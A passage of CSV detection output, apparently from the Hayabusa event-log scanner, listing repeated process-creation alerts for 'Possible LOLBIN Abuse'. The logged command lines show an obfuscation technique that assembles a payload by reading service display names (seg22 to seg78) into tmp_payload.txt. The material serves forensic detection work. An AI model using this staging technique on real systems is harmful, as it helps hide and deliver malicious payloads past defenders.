| User: FS03$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:58.654 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg22"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf0c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:58.654 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg22"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xaf0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:00.089 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg23"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf94 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files 
or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:00.104 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg23"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x88 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:01.557 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg24"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x888 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:01.557 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg24"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd08 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:03.010 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg25"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc10 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:03.026 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg25"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc80 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:04.458 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg26"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xeb0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:04.458 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg26"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf18 | User: 
FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:05.896 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg27"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc94 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:05.911 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg27"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xebc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:07.342 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg28"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x1c8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense 
Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:07.342 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg28"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xacc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:08.797 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg29"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x2ac | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:08.797 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg29"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa84 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:10.236 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd 
Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg30"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6a4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:10.236 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg30"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x964 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:11.689 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg31"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xcfc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:11.689 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg31"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:13.147 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg32"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xad8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:13.147 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg32"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x990 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:14.607 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg33"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xde8 | User: FS03$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:14.623 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg33"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x944 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:16.065 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg34"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x4a8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:16.080 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg34"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa14 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files 
or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:17.549 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg35"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6fc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:17.565 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg35"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x474 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:19.048 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg36"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6b8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:19.048 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
powershell -command ""Get-Service ""seg36"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xafc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:20.564 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg37"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf00 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:20.564 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg37"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa80 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:22.050 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg38"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3f4 | User: 
FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:12.952 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg73"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x8f4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:12.952 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg73"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xbf8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:14.409 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg74"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x8f0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense 
Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:14.409 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg74"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc8c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:15.863 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg75"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6b8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:15.863 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg75"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9c0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:17.308 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd 
Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg76"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x9d0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:17.324 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg76"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x42c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:18.775 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg77"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd10 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:18.790 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg77"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc74 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:20.263 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg78"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf60 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:20.263 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg78"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf3c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 